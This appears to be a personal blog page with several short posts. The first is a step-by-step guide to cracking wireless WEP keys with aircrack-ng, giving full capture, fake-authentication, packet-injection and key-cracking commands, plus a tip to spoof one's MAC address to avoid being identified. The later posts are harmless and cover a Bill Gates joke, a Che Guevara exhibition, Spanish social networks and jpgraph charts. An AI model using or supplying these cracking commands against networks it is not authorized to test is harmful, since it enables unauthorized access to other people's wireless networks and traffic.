A friend of mine asked me how people does to Crack Wireless WEP-Keys. So I though about sharing with everybody.
Ubuntu and Debian already have the program in their packages:
$ apt-cache search aircrack
aircrack - wireless WEP/WPA cracker
So just get it from there with apt-get install. Other distros can take it from Aircrack-ng website. In the same website there is lots of interesting info and steps of how to do it. This is how I did it:
# 1st step: Start capturing packets and saving them in a text file
airodump-ng -w wepsave.txt.ivs --channel 11 --bssid 00:14:BF:B2:1A:DB ra0
# 2nd step: Log in to the router. You need to get logged into the router if you want to inject packets.
sudo aireplay-ng -1 30 -o 10 -e 'ESSIDName' -a 00:14:BF:B2:1A:DB -h 00:19:D3:32:42:9C ra0
(Use a false MAC adress if you don’t want to reveal yours / Replace RA0 with Your wireless interface)
# 3rd step: Inject some packets. It gets really faster like this.
sudo aireplay-ng -3 -b 00:14:BF:B2:1A:DB -h 00:19:D3:32:42:9C ra0
# Last step. CRACK the key:
aircrack-ng -f 14 wepsave.txt.ivs wepsave.txt.ivs-01.cap wepsave.txt.ivs-02.cap
That’s it. Cross fingers and wait. If everything goes fine you will end up with a Nice message like ” SUCCESS. The key is XXXXXXXXX “
Use this learning to test your own wireless security.
SOME THINGS TO SHARE
Bill Gates last day at Microsoft : Finally Bill does a favour to humanity and retires from Microsoft. Rumours says he is now using Ubuntu and downloading music with bittorrent.
The bittorrent applet to preview music (only mp3 and ogg)
In pictures: Photos of the year 2006 Thanks papa for sending me this. Now I have a sad morning.
In my last trip to Barcelona I visited the exposition CH€ about Ernesto Guevara.

Ernesto, later called “El Che” by the Cubans always caught my attention for 2 reasons: His Courage and his dedication to work until the last minute of his life.
(TRANSLATION PENDING)
That two reasons, almost extinguished in most youngsters today, summed that he was one of the leaders of the Cuban revolution have made him one of my favorite heroes.
Video documentary:
( Download video )
Today I’ve been reading news about spanish speaking communities and I had the idea to make a small research about them. There is a more complete list in Loogic rank. I start the small list with the proffesional networks and then I follow with the rest.
(IN TRANSLATION PROCESS)







Lately I see there is a growing interest in the communites ala “social web” in Spanish.
Tonight I’ve playing with a library that I’ve used many times in other projects:
The jpgraph graphic charts lib.
This are the first two graph examples with data gathered from Technorati:
You can play with it and change data to refresh the graphic result. I decided that I will start programming more frequently since this year I want to pass the Zend PHP certification exam. So from time to time I’ll be adding new things on the lab and I will blog to get some feedback.